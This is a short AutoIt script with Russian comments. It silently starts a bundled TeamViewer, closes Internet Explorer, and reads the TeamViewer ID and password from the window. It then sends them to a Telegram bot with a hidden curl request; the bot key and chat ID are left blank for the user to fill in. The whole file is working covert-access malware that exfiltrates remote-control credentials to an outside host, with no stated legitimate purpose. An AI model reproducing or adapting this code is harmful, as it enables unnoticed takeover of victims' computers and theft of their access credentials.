#NoTrayIcon $sBotKey = '' ; Ваш api ключ бота $nChatId = '' ; Id получателя $Curl = @ScriptDir & '\bin\curl.exe' Run(@ScriptDir & "\bin\TV\TeamViewer.exe") ProcessWait ("iexplore.exe") ProcessClose ("iexplore.exe") WinWait("TeamViewer","") WinActivate("TeamViewer","") WinWaitActive("TeamViewer","") While 1 $id = ControlGetText("TeamViewer","","[CLASS:Edit; INSTANCE:4]") if $id = "-" Then Sleep(3000) Else $password = ControlGetText("TeamViewer","","[CLASS:Edit; INSTANCE:5]") $smass = $id & '%20%20%20' & $password $sOutput = StringRegExpReplace($smass, " ", "%20") Run($Curl & ' https://api.telegram.org/bot' & $sBotKey & '/sendMessage?chat_id=' & $nChatId & '&text=' & $sOutput, '', @SW_HIDE) For $i = 5 To 1 Step -1 Send("{CAPSLOCK on}") Sleep(500) Send("{CAPSLOCK off}") Sleep(500) Next Exit EndIf WEnd Func _URIEncode($sData) Local $aData = StringSplit(BinaryToString(StringToBinary($sData,4),1),"") Local $nChar $sData="" For $i = 1 To $aData[0] $nChar = Asc($aData[$i]) Switch $nChar Case 45, 46, 48 To 57, 65 To 90, 95, 97 To 122, 126 $sData &= $aData[$i] Case 32 $sData &= "+" Case Else $sData &= "%" & Hex($nChar,2) EndSwitch Next Return $sData EndFunc